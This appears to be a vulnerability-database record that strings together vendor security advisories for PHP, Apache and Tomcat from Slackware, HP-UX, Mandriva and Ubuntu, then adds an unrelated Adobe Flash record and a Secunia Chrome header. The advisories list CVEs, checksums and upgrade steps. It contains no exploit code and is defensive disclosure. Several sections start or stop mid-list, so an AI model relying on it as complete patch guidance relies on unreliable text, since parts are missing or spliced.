2666059d6540b1b4385d25dfc5ebbe99 php-5.4.40-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
c146f500912ba9c7e5d652e5e3643c04 php-5.4.40-x86_64-1_slack14.0.txz
Slackware 14.1 package:
9efc8a96f9a3f3261e5f640292b1b781 php-5.4.40-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
2c95e077f314f1cfa3ee83b9aba90b91 php-5.4.40-x86_64-1_slack14.1.txz
Slackware -current package:
30d14f237c71fada0d594c2360a58016 n/php-5.6.8-i486-1.txz
Slackware x86_64 -current package:
1a0fcc590aa4dff5de5f08293936d0d9 n/php-5.6.8-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg php-5.4.40-i486-1_slack14.1.txz
Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address.
Release Date: 2015-06-10
Last Updated: 2015-06-10
Potential Security Impact: Remote denial of service (DoS), man-in-the-middle
(MitM) attack, modification of data, local modification of data
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with the HP-UX Apache
Web Server Suite, Tomcat Servlet Engine, and PHP. These could be exploited
remotely to create a Denial of Service (DoS) and other vulnerabilities.
HP-UX B.11.31 running HP-UX Apache Web Server Suite v4.04 or earlier
HP-UX B.11.31 running HP-UX Apache Web Server v2.2.15.22 or earlier
HP-UX B.11.31 running Tomcat Servlet Engine v6.0.39.03 or earlier
HP-UX B.11.31 running PHP v5.4.11.04 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-5704 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0227 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9709 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-1352 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2305 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2783 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software updates to resolve the
vulnerabilities.
The updates are available for download from http://software.hp.com
NOTE: HP-UX Web Server Suite v4.05 HPUXWSATW405 contains Apache v2.2.29.01,
Tomcat Servlet Engine 6.0.43.01, PHP 5.4.40.01, and Webmin v1.070.13
HP-UX 11i Release
Apache Depot name
B.11.31 (11i v3 32-bit)
HP_UX_11.31_HPUXWS22ATW-B405-11-31-64.depot
B.11.31 (11i v3 64-bit)
HP_UX_11.31_HPUXWS22ATW-B405-11-31-64.depot
MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v4.05 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
action: install revision B.2.2.29.01 or subsequent
hpuxws22TOMCAT.TOMCAT
action: install revision C.6.0.43.01 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 10 June 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:080
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : php
Date : March 28, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and corrected in php:
It was discovered that the file utility contains a flaw in the handling
of indirect magic rules in the libmagic library, which leads to an
infinite recursion when trying to determine the file type of certain
files (CVE-2014-1943).
A flaw was found in the way the file utility determined the type of
Portable Executable (PE) format files, the executable format used on
Windows. A malicious PE file could cause the file utility to crash or,
potentially, execute arbitrary code (CVE-2014-2270).
The BEGIN regular expression in the awk script detector in
magic/Magdir/commands in file before 5.15 uses multiple wildcards
with unlimited repetitions, which allows context-dependent attackers
to cause a denial of service (CPU consumption) via a crafted ASCII
file that triggers a large amount of backtracking, as demonstrated
via a file with many newline characters (CVE-2013-7345).
PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain
socket with world-writable permissions by default, which allows any
local user to connect to it and execute PHP scripts as the apache user
(CVE-2014-0185).
A flaw was found in the way file's Composite Document Files (CDF)
format parser handle CDF files with many summary info entries.
The cdf_unpack_summary_info() function unnecessarily repeatedly read
the info from the same offset. This led to many file_printf() calls in
cdf_file_property_info(), which caused file to use an excessive amount
of CPU time when parsing a specially-crafted CDF file (CVE-2014-0237).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files. A property entry with 0 elements
triggers an infinite loop (CVE-2014-0238).
The unserialize() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue related to the SPL ArrayObject and SPLObjectStorage
Types (CVE-2014-3515).
It was discovered that PHP is vulnerable to a heap-based buffer
overflow in the DNS TXT record parsing. A malicious server or
man-in-the-middle attacker could possibly use this flaw to execute
arbitrary code as the PHP interpreter if a PHP application uses
dns_get_record() to perform a DNS query (CVE-2014-4049).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files, where the mconvert() function did
not correctly compute the truncated pascal string size (CVE-2014-3478).
Multiple flaws were found in the way file parsed property information
from Composite Document Files (CDF) files, due to insufficient boundary
checks on buffers (CVE-2014-0207, CVE-2014-3479, CVE-2014-3480,
CVE-2014-3487).
The phpinfo() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue that can cause it to leak arbitrary process memory
(CVE-2014-4721). NOTE: this vulnerability exists because of an incomplete fix
for CVE-2012-1571 (CVE-2014-3587). NOTE:
this issue exists because of an incomplete fix for CVE-2014-4049
(CVE-2014-3597).
An integer overflow flaw in PHP's unserialize() function was
reported. If unserialize() were used on untrusted data, this
issue could lead to a crash or potentially information disclosure
(CVE-2014-3669).
A heap corruption issue was reported in PHP's exif_thumbnail()
function. A specially-crafted JPEG image could cause the PHP
interpreter to crash or, potentially, execute arbitrary code
(CVE-2014-3670).
If client-supplied input was passed to PHP's cURL client as a URL to
download, it could return local files from the server due to improper
handling of null bytes (PHP#68089).
An out-of-bounds read flaw was found in file's donote() function in the
way the file utility determined the note headers of a elf file. This
could possibly lead to file executable crash (CVE-2014-3710).
A use-after-free flaw was found in PHP unserialize(). An untrusted
input could cause PHP interpreter to crash or, possibly, execute
arbitrary code when processed using unserialize() (CVE-2014-8142).
sapi/cgi/cgi_main.c in the CGI component in PHP before 5.5.21, when
mmap is used to read a .php file, does not properly consider the
mapping's length during processing of an invalid file that begins
with a # character and lacks a newline character, which causes an
out-of-bounds read and might allow remote attackers to obtain sensitive
information from php-cgi process memory by leveraging the ability to
upload a .php file or trigger unexpected code execution if a valid
PHP script is present in memory locations adjacent to the mapping
(CVE-2014-9427).
Free called on an uninitialized pointer in php-exif in PHP before
5.5.21 (CVE-2015-0232).
The readelf.c source file has been removed from PHP's bundled copy of
file's libmagic, eliminating exposure to denial of service issues in
ELF file parsing such as CVE-2014-8116, CVE-2014-8117, CVE-2014-9620
and CVE-2014-9621 in PHP's fileinfo module.
S. Paraschoudis discovered that PHP incorrectly handled memory in
the enchant binding.
Taoguang Chen discovered that PHP incorrectly handled unserializing
objects.
It was discovered that PHP incorrectly handled memory in the phar
extension. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2014-8142 (CVE-2015-0231).
An integer overflow flaw, leading to a heap-based buffer overflow,
was found in the way libzip, which is embedded in PHP, processed
certain ZIP archives. If an attacker were able to supply a specially
crafted ZIP archive to an application using libzip, it could cause
the application to crash or, possibly, execute arbitrary code
(CVE-2015-2331).
It was discovered that the PHP opcache component incorrectly handled
memory.
It was discovered that the PHP PostgreSQL database extension
incorrectly handled certain pointers.
PHP contains a bundled copy of the file utility's libmagic library,
so it was vulnerable to the libmagic issues.
The updated php packages have been patched and upgraded to the 5.5.23
version which is not vulnerable to these issues. The libzip packages
has been patched to address the CVE-2015-2331 flaw.
A bug in the php zip extension that could cause a crash has been fixed
(mga#13820)
Additionally the jsonc and timezonedb packages has been upgraded to
the latest versions and the PECL packages which requires so has been
rebuilt for php-5.5.23.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9705
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://php.net/ChangeLog-5.php#5.5.9
http://php.net/ChangeLog-5.php#5.5.10
http://php.net/ChangeLog-5.php#5.5.11
http://php.net/ChangeLog-5.php#5.5.12
http://php.net/ChangeLog-5.php#5.5.13
http://php.net/ChangeLog-5.php#5.5.14
http://php.net/ChangeLog-5.php#5.5.15
http://php.net/ChangeLog-5.php#5.5.16
http://php.net/ChangeLog-5.php#5.5.17
http://php.net/ChangeLog-5.php#5.5.18
http://php.net/ChangeLog-5.php#5.5.19
http://php.net/ChangeLog-5.php#5.5.20
http://php.net/ChangeLog-5.php#5.5.21
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.23
http://www.ubuntu.com/usn/usn-2535-1/
http://www.ubuntu.com/usn/usn-2501-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1204676
http://advisories.mageia.org/MGASA-2014-0163.html
http://advisories.mageia.org/MGASA-2014-0178.html
http://advisories.mageia.org/MGASA-2014-0215.html
http://advisories.mageia.org/MGASA-2014-0258.html
http://advisories.mageia.org/MGASA-2014-0284.html
http://advisories.mageia.org/MGASA-2014-0324.html
http://advisories.mageia.org/MGASA-2014-0367.html
http://advisories.mageia.org/MGASA-2014-0430.html
http://advisories.mageia.org/MGASA-2014-0441.html
http://advisories.mageia.org/MGASA-2014-0542.html
http://advisories.mageia.org/MGASA-2015-0040.html
https://bugs.mageia.org/show_bug.cgi?id=13820
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
a4e09575e26b690bd44801a126795ce9 mbs2/x86_64/apache-mod_php-5.5.23-1.mbs2.x86_64.rpm
e156aaf446f543279f758b767e5ce6f2 mbs2/x86_64/lib64php5_common5-5.5.23-1.mbs2.x86_64.rpm
cf1653dd6b3606ff8983739fe7728502 mbs2/x86_64/lib64zip2-0.11.2-1.1.mbs2.x86_64.rpm
2ed6c588ca428a502ab995726d497527 mbs2/x86_64/lib64zip-devel-0.11.2-1.1.mbs2.x86_64.rpm
91fd4a50d38c904247519a34f71ac9a7 mbs2/x86_64/libzip-0.11.2-1.1.mbs2.x86_64.rpm
0fad2aa8ca3bed422588c7d7c349e3e7 mbs2/x86_64/php-bcmath-5.5.23-1.mbs2.x86_64.rpm
b797a14554b170f1f2c307eebd5011ce mbs2/x86_64/php-bz2-5.5.23-1.mbs2.x86_64.rpm
83abadd87c78c719b585acbfcbf1f54a mbs2/x86_64/php-calendar-5.5.23-1.mbs2.x86_64.rpm
71b728b5c58335c37e9ee059a98179b5 mbs2/x86_64/php-cgi-5.5.23-1.mbs2.x86_64.rpm
d6047e2545b396ad29b2619c3d811b49 mbs2/x86_64/php-cli-5.5.23-1.mbs2.x86_64.rpm
933344ca17f96bd844db47c993b8ce1a mbs2/x86_64/php-ctype-5.5.23-1.mbs2.x86_64.rpm
0278a991ed7a7ea1d51c6651b1157744 mbs2/x86_64/php-curl-5.5.23-1.mbs2.x86_64.rpm
a3f172d95d061f6a2ba9ce562f1068ac mbs2/x86_64/php-dba-5.5.23-1.mbs2.x86_64.rpm
d239cccc6594bfe8169c0b5300ca1dd0 mbs2/x86_64/php-devel-5.5.23-1.mbs2.x86_64.rpm
73a234b9c369a20c349fca7f425b405a mbs2/x86_64/php-doc-5.5.23-1.mbs2.noarch.rpm
ab4caa5f1a397e2f267479f08616d027 mbs2/x86_64/php-dom-5.5.23-1.mbs2.x86_64.rpm
016b8d010a1866935f2a6889b712300c mbs2/x86_64/php-enchant-5.5.23-1.mbs2.x86_64.rpm
f9bd5f358336ea8a997f85f4d690fd40 mbs2/x86_64/php-exif-5.5.23-1.mbs2.x86_64.rpm
9f0ef885d5e7abb84c1b0c6242bd1a54 mbs2/x86_64/php-fileinfo-5.5.23-1.mbs2.x86_64.rpm
f551fc699944abdbd78cd1f74e1db713 mbs2/x86_64/php-filter-5.5.23-1.mbs2.x86_64.rpm
10c6ad89a0707acdff025ee0166b4361 mbs2/x86_64/php-fpm-5.5.23-1.mbs2.x86_64.rpm
fad5946e3ff8bf1d3b7215fee229b934 mbs2/x86_64/php-ftp-5.5.23-1.mbs2.x86_64.rpm
c74071a614cc4f8d5ac612736264aad2 mbs2/x86_64/php-gd-5.5.23-1.mbs2.x86_64.rpm
788e0972b5aa918a0c8ce2b0e30270a6 mbs2/x86_64/php-gettext-5.5.23-1.mbs2.x86_64.rpm
996120d4c1fa233bdb38aedf0718f593 mbs2/x86_64/php-gmp-5.5.23-1.mbs2.x86_64.rpm
e032d9a3c8e078242347623f1ff51b5a mbs2/x86_64/php-hash-5.5.23-1.mbs2.x86_64.rpm
c1da3a1898b05995091ad1c2237bdf6a mbs2/x86_64/php-iconv-5.5.23-1.mbs2.x86_64.rpm
37b4a5d86006024878d397a8478d5a42 mbs2/x86_64/php-imap-5.5.23-1.mbs2.x86_64.rpm
bd10d9a55ee8db73b4d80dae1e14e4e0 mbs2/x86_64/php-ini-5.5.23-1.mbs2.x86_64.rpm
4cb54cd72bd26728bb29f5d00a5174af mbs2/x86_64/php-interbase-5.5.23-1.mbs2.x86_64.rpm
2713dca82ad94d88b379db3fa012ed2d mbs2/x86_64/php-intl-5.5.23-1.mbs2.x86_64.rpm
f0a9187b81e038400dae4e01123b751c mbs2/x86_64/php-json-5.5.23-1.mbs2.x86_64.rpm
c395a0cb573d9432c9e4c2a4b92d1d0f mbs2/x86_64/php-ldap-5.5.23-1.mbs2.x86_64.rpm
f2374e34b874072d2268acf1c72b383a mbs2/x86_64/php-mbstring-5.5.23-1.mbs2.x86_64.rpm
7ca3ce3a9464933af1a147c206c25d0d mbs2/x86_64/php-mcrypt-5.5.23-1.mbs2.x86_64.rpm
dbe828f1c2caa3eef932fc0c14a7e2e9 mbs2/x86_64/php-mssql-5.5.23-1.mbs2.x86_64.rpm
995e9f09906309252d850618c3fffaa6 mbs2/x86_64/php-mysql-5.5.23-1.mbs2.x86_64.rpm
c474c1f1dc45f14ea5357092277d2f22 mbs2/x86_64/php-mysqli-5.5.23-1.mbs2.x86_64.rpm
cdcb4872386b83ef3969f918bf99f941 mbs2/x86_64/php-mysqlnd-5.5.23-1.mbs2.x86_64.rpm
cbb1652273fb07f216c50b8d1b5445c2 mbs2/x86_64/php-odbc-5.5.23-1.mbs2.x86_64.rpm
29ab61a3d1d00ad57c875d87b62d2e12 mbs2/x86_64/php-opcache-5.5.23-1.mbs2.x86_64.rpm
349f796a960ef2207b30a06e386f2653 mbs2/x86_64/php-openssl-5.5.23-1.mbs2.x86_64.rpm
7a7411900384da8741e32a3f6f8036c2 mbs2/x86_64/php-pcntl-5.5.23-1.mbs2.x86_64.rpm
ba3b14e45177b257ada03f7ff4b16deb mbs2/x86_64/php-pdo-5.5.23-1.mbs2.x86_64.rpm
ae5b57dbff67c7595e154313321ff693 mbs2/x86_64/php-pdo_dblib-5.5.23-1.mbs2.x86_64.rpm
8782f71797f7cb271a514b735b19621a mbs2/x86_64/php-pdo_firebird-5.5.23-1.mbs2.x86_64.rpm
ac39db58d4100f3d2d24593d3b5907fc mbs2/x86_64/php-pdo_mysql-5.5.23-1.mbs2.x86_64.rpm
210b990793c2d616fb0aecc4fde28eb6 mbs2/x86_64/php-pdo_odbc-5.5.23-1.mbs2.x86_64.rpm
6ae4df7959ddd3a8a0724ddddbe41a71 mbs2/x86_64/php-pdo_pgsql-5.5.23-1.mbs2.x86_64.rpm
1f9bdab81fa668dd583abe873892993e mbs2/x86_64/php-pdo_sqlite-5.5.23-1.mbs2.x86_64.rpm
f0cbb5dde255f5c8fa3e04e3a5314ab1 mbs2/x86_64/php-pgsql-5.5.23-1.mbs2.x86_64.rpm
e46ac8c820911a6091540e135f103154 mbs2/x86_64/php-phar-5.5.23-1.mbs2.x86_64.rpm
5050a745bfc3b1f5eeced2dd85f79721 mbs2/x86_64/php-posix-5.5.23-1.mbs2.x86_64.rpm
c9093134a518c07f4e8a188987f853d3 mbs2/x86_64/php-readline-5.5.23-1.mbs2.x86_64.rpm
2b48c3f35573e00b5ba4327e8edc05f2 mbs2/x86_64/php-recode-5.5.23-1.mbs2.x86_64.rpm
ae2157230db4d6e28698db384c8f7fcb mbs2/x86_64/php-session-5.5.23-1.mbs2.x86_64.rpm
2610a739bfa29ff11e648c7baa1d8bc3 mbs2/x86_64/php-shmop-5.5.23-1.mbs2.x86_64.rpm
b7999e11cf9d2ab510263e32cabaf312 mbs2/x86_64/php-snmp-5.5.23-1.mbs2.x86_64.rpm
ab665c30f0d2f13baa1c6475b7df7cac mbs2/x86_64/php-soap-5.5.23-1.mbs2.x86_64.rpm
f331837ba716316cef094765a1700101 mbs2/x86_64/php-sockets-5.5.23-1.mbs2.x86_64.rpm
134f8bb18790bd023e73919a794703a0 mbs2/x86_64/php-sqlite3-5.5.23-1.mbs2.x86_64.rpm
4b4aa44d0ac56629610bb0444f199df5 mbs2/x86_64/php-sybase_ct-5.5.23-1.mbs2.x86_64.rpm
fc69f644f36308d81f37f356b76e40a1 mbs2/x86_64/php-sysvmsg-5.5.23-1.mbs2.x86_64.rpm
981b7ef6715aacfe9250b206dbbbad31 mbs2/x86_64/php-sysvsem-5.5.23-1.mbs2.x86_64.rpm
91c006555173d03f1d25899947702673 mbs2/x86_64/php-sysvshm-5.5.23-1.mbs2.x86_64.rpm
62e5fa5fa8b4d89d7835f2f68169af14 mbs2/x86_64/php-tidy-5.5.23-1.mbs2.x86_64.rpm
0c5a9237c710dd098c8bb56018f7a142 mbs2/x86_64/php-timezonedb-2015.1-1.mbs2.x86_64.rpm
d94aa68a9ce76bce5c962c58f37ac5a5 mbs2/x86_64/php-tokenizer-5.5.23-1.mbs2.x86_64.rpm
317c7da32daa223560dc08bbae89d98d mbs2/x86_64/php-wddx-5.5.23-1.mbs2.x86_64.rpm
9b2cf90dfc6f6bdc0431a6f94d43a947 mbs2/x86_64/php-xml-5.5.23-1.mbs2.x86_64.rpm
0a1b6e0beeb36f24f9250a352fbff1e9 mbs2/x86_64/php-xmlreader-5.5.23-1.mbs2.x86_64.rpm
598925bc71347774e805b6fcfcbcf590 mbs2/x86_64/php-xmlrpc-5.5.23-1.mbs2.x86_64.rpm
49a1f8e773e98bb101488b805670651c mbs2/x86_64/php-xmlwriter-5.5.23-1.mbs2.x86_64.rpm
0b7c2f2fe7b3103631dd07d12d443e06 mbs2/x86_64/php-xsl-5.5.23-1.mbs2.x86_64.rpm
5cb68626d863213de934655dac8342c8 mbs2/x86_64/php-zip-5.5.23-1.mbs2.x86_64.rpm
a27bab106c0ba87f220ff35937210a63 mbs2/x86_64/php-zlib-5.5.23-1.mbs2.x86_64.rpm
3dd6a6eeb12c7207446053e4785d6974 mbs2/SRPMS/libzip-0.11.2-1.1.mbs2.src.rpm
5d69769d822628a5bf1485eaa1251b8e mbs2/SRPMS/php-5.5.23-1.mbs2.src.rpm
0a629c11ca23ba56d57f61a754def293 mbs2/SRPMS/php-timezonedb-2015.1-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFlFxmqjQ0CJFipgRApIaAJ0TuOLlCRGmp4O6TdNSKUpeRBS2xACgzIEB
yZuDdHZcMPOQTP7seWcvVWc=
=esZS
-----END PGP SIGNATURE-----
. ============================================================================
Ubuntu Security Notice USN-2535-1
March 18, 2015
php5 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in PHP.
(CVE-2015-2301)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.3
php5-cgi 5.5.12+dfsg-2ubuntu4.3
php5-cli 5.5.12+dfsg-2ubuntu4.3
php5-enchant 5.5.12+dfsg-2ubuntu4.3
php5-fpm 5.5.12+dfsg-2ubuntu4.3
Ubuntu 14.04 LTS:
libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.7
php5-cgi 5.5.9+dfsg-1ubuntu4.7
php5-cli 5.5.9+dfsg-1ubuntu4.7
php5-enchant 5.5.9+dfsg-1ubuntu4.7
php5-fpm 5.5.9+dfsg-1ubuntu4.7
Ubuntu 12.04 LTS:
libapache2-mod-php5 5.3.10-1ubuntu3.17
php5-cgi 5.3.10-1ubuntu3.17
php5-cli 5.3.10-1ubuntu3.17
php5-enchant 5.3.10-1ubuntu3.17
php5-fpm 5.3.10-1ubuntu3.17
Ubuntu 10.04 LTS:
libapache2-mod-php5 5.3.2-1ubuntu4.29
php5-cgi 5.3.2-1ubuntu4.29
php5-cli 5.3.2-1ubuntu4.29
php5-enchant 5.3.2-1ubuntu4.29
In general, a standard system update will make all the necessary changes |
|
var-201211-0370
|
Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2012-5274, CVE-2012-5275, CVE-2012-5276, and CVE-2012-5277. Adobe Flash Player Contains a buffer overflow vulnerability. This vulnerability CVE-2012-5274 , CVE-2012-5275 , CVE-2012-5276 ,and CVE-2012-5277 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions.
Note: This issue was previously covered in BID 56412 (Adobe Flash Player and AIR APSB12-24 Multiple Security Vulnerabilities) but has been given its own record to better document it. The product enables viewing of applications, content and video across screens and browsers. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA51210
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51210/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51210
RELEASE DATE:
2012-11-07
DISCUSS ADVISORY:
http://secunia.com/advisories/51210/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/51210/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
